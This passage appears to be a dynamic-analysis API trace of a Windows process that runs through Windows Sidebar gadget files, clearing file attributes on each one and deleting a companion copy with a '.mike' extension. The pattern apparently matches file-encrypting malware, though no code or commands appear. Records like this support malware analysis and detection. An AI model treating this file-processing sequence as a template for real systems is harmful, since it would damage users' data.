lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", dwFileAttributes=0x80) returned 0 [0104.844] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png.mike")) returned 1 [0104.845] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.845] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.845] CoTaskMemFree (pv=0x506980) [0104.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.846] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0104.854] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png.mike")) returned 1 [0104.856] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0104.860] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png.mike")) returned 1 [0104.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0104.867] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png.mike")) returned 1 [0104.869] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.869] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.869] CoTaskMemFree (pv=0x506980) [0104.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.870] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html", dwFileAttributes=0x80) returned 0 [0104.878] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\flyout.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\flyout.html.mike")) returned 1 [0104.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0104.885] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml.mike")) returned 1 [0104.886] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html", dwFileAttributes=0x80) returned 0 [0104.891] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html.mike")) returned 1 [0104.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0104.898] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html.mike")) returned 1 [0104.899] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.899] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.899] CoTaskMemFree (pv=0x506980) [0104.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.900] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.900] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.900] CoTaskMemFree (pv=0x506980) [0104.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.900] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.900] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.900] CoTaskMemFree (pv=0x506980) [0104.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.908] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png", dwFileAttributes=0x80) returned 0 [0104.912] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png.mike")) returned 1 [0104.914] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png", dwFileAttributes=0x80) returned 0 [0104.918] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png.mike")) returned 1 [0104.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png", dwFileAttributes=0x80) returned 0 [0104.924] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png.mike")) returned 1 [0104.933] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png", dwFileAttributes=0x80) returned 0 [0104.938] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png.mike")) returned 1 [0104.939] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png", dwFileAttributes=0x80) returned 0 [0104.945] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png.mike")) returned 1 [0104.947] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png", dwFileAttributes=0x80) returned 0 [0104.951] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png.mike")) returned 1 [0104.952] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png", dwFileAttributes=0x80) returned 0 [0104.957] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png.mike")) returned 1 [0104.959] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png", dwFileAttributes=0x80) returned 0 [0104.964] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_flyout.png.mike")) returned 1 [0104.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png", dwFileAttributes=0x80) returned 0 [0104.970] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\navBack.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\navback.png.mike")) returned 1 [0104.972] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png", dwFileAttributes=0x80) returned 0 [0104.981] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_docked.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_docked.png.mike")) returned 1 [0104.982] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png", dwFileAttributes=0x80) returned 0 [0104.987] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rssBackBlue_Undocked.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rssbackblue_undocked.png.mike")) returned 1 [0104.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png", dwFileAttributes=0x80) returned 0 [0104.994] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_docked.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_docked.png.mike")) returned 1 [0104.996] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png", dwFileAttributes=0x80) returned 0 [0105.002] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_floating.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_floating.png.mike")) returned 1 [0105.004] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png", dwFileAttributes=0x80) returned 0 [0105.008] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\rss_headline_glow_flyout.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\rss_headline_glow_flyout.png.mike")) returned 1 [0105.010] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.010] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.010] CoTaskMemFree (pv=0x506980) [0105.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.012] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0105.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0105.021] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png.mike")) returned 1 [0105.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0105.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0105.028] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png.mike")) returned 1 [0105.029] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0105.035] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0105.035] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png.mike")) returned 1 [0105.036] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.036] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.036] CoTaskMemFree (pv=0x506980) [0105.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.038] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0105.044] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml.mike")) returned 1 [0105.045] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0105.050] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html.mike")) returned 1 [0105.052] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html", dwFileAttributes=0x80) returned 0 [0105.057] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html.mike")) returned 1 [0105.058] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.058] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.058] CoTaskMemFree (pv=0x506980) [0105.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.059] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.059] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.059] CoTaskMemFree (pv=0x506980) [0105.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.060] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.060] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.060] CoTaskMemFree (pv=0x506980) [0105.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png", dwFileAttributes=0x80) returned 0 [0105.073] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png.mike")) returned 1 [0105.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png", dwFileAttributes=0x80) returned 0 [0105.080] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png.mike")) returned 1 [0105.082] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png", dwFileAttributes=0x80) returned 0 [0105.087] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_hov.png.mike")) returned 1 [0105.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, 